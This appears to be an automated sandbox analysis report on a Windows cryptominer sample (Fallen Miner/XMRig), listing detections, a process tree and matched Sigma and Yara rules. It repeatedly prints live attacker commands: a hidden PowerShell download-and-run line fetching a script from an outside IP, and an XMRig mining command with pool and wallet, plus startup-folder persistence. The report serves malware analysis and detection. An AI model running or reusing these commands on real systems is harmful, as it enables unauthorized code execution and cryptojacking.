Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yjYJ8QncaF.exe

Overview

General Information

Sample name:yjYJ8QncaF.exe
renamed because original name is a hash value
Original sample name:5b3ed060facb9d57d8d0539084686870.exe
Analysis ID:1630727
MD5:5b3ed060facb9d57d8d0539084686870
SHA1:9cae8c44e44605d02902c29519ea4700b4906c76
SHA256:7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
Tags:exeuser-abuse_ch
Infos:

Detection

Fallen Miner, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Fallen Miner
Yara detected Xmrig cryptocurrency miner
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Compiles code for process injection (via .Net compiler)
Connects to a pastebin service (likely for C&C)
Creates a thread in another existing process (thread injection)
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Joe Sandbox ML detected suspicious sample
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Notepad Making Network Connection
Sigma detected: Potential Crypto Mining Activity
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • yjYJ8QncaF.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\yjYJ8QncaF.exe" MD5: 5B3ED060FACB9D57D8D0539084686870)
    • cmd.exe (PID: 7356 cmdline: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7408 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • csc.exe (PID: 7836 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 7856 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
            • wscript.exe (PID: 1848 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
              • cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                • conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • timeout.exe (PID: 3168 cmdline: timeout /t 30 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
                • powershell.exe (PID: 2664 cmdline: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
                  • csc.exe (PID: 7320 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
                    • cvtres.exe (PID: 7356 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
            • notepad.exe (PID: 2568 cmdline: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40 MD5: 27F71B12CB585541885A31BE22F61C83)
            • tasklist.exe (PID: 7700 cmdline: tasklist /FI "PID eq 2568" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • conhost.exe (PID: 5932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 7844 cmdline: tasklist /FI "PID eq 2568" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
              • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • explorer.exe (PID: 8120 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 2312 cmdline: C:\Windows\system32\WerFault.exe -u -p 8120 -s 7208 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 1076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • explorer.exe (PID: 6592 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • WerFault.exe (PID: 5840 cmdline: C:\Windows\system32\WerFault.exe -u -p 6592 -s 7472 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • explorer.exe (PID: 4824 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    sslproxydump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x5e02cf:$a1: mining.set_target
    • 0xce4c46:$a1: mining.set_target
    • 0x5da785:$a2: XMRIG_HOSTNAME
    • 0xcdf188:$a2: XMRIG_HOSTNAME
    • 0x5dca9d:$a3: Usage: xmrig [OPTIONS]
    • 0xce1414:$a3: Usage: xmrig [OPTIONS]
    • 0x5da75d:$a4: XMRIG_VERSION
    • 0xcdf160:$a4: XMRIG_VERSION
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.2584264262.000000C000222000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000009.00000002.2566809285.0000000057280000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x87f710:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
      00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x47a470:$a1: mining.set_target
        • 0x474e58:$a2: XMRIG_HOSTNAME
        • 0x476f40:$a3: Usage: xmrig [OPTIONS]
        • 0x474e30:$a4: XMRIG_VERSION
        00000009.00000002.2568842224.0000000057B10000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_FallenMinerYara detected Fallen MinerJoe Security
          Click to see the 6 entries
          SourceRuleDescriptionAuthorStrings
          9.2.explorer.exe.c000252000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            9.2.explorer.exe.c000252000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x23d070:$a1: mining.set_target
            • 0x237a58:$a2: XMRIG_HOSTNAME
            • 0x239b40:$a3: Usage: xmrig [OPTIONS]
            • 0x237a30:$a4: XMRIG_VERSION
            9.2.explorer.exe.c000252000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
            • 0x2440e1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
            9.2.explorer.exe.c000252000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
            • 0x2445b0:$s1: %s/%s (Windows NT %lu.%lu
            • 0x245630:$s3: \\.\WinRing0_
            • 0x23bd38:$s4: pool_wallet
            • 0x2372a8:$s5: cryptonight
            • 0x2372b8:$s5: cryptonight
            • 0x2372c8:$s5: cryptonight
            • 0x2372d8:$s5: cryptonight
            • 0x2372f0:$s5: cryptonight
            • 0x237300:$s5: cryptonight
            • 0x237310:$s5: cryptonight
            • 0x237328:$s5: cryptonight
            • 0x237338:$s5: cryptonight
            • 0x237350:$s5: cryptonight
            • 0x237368:$s5: cryptonight
            • 0x237378:$s5: cryptonight
            • 0x237388:$s5: cryptonight
            • 0x237398:$s5: cryptonight
            • 0x2373b0:$s5: cryptonight
            • 0x2373c8:$s5: cryptonight
            • 0x2373d8:$s5: cryptonight
            • 0x2373e8:$s5: cryptonight
            9.2.explorer.exe.c000af2000.3.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
              Click to see the 3 entries

              Bitcoin Miner

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine|base64offset|contains: h^Wz, Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, ProcessId: 2568, ProcessName: notepad.exe

              System Summary

              barindex
              Source: Network ConnectionAuthor: EagleEye Team: Data: DestinationIp: 192.248.189.11, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\notepad.exe, Initiated: true, ProcessId: 2568, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, CommandLine|base64offset|contains: h^Wz, Image: C:\Windows\System32\notepad.exe, NewProcessName: C:\Windows\System32\notepad.exe, OriginalFileName: C:\Windows\System32\notepad.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40, ProcessId: 2568, ProcessName: notepad.exe
              Source: File createdAuthor: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 2580, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs" , ProcessId: 1848, ProcessName: wscript.exe
              Source: Process startedAuthor: frack113: Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1" , ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7624, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline", ProcessId: 7836, ProcessName: csc.exe
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7624, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7356, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}", ProcessId: 7408, ProcessName: powershell.exe
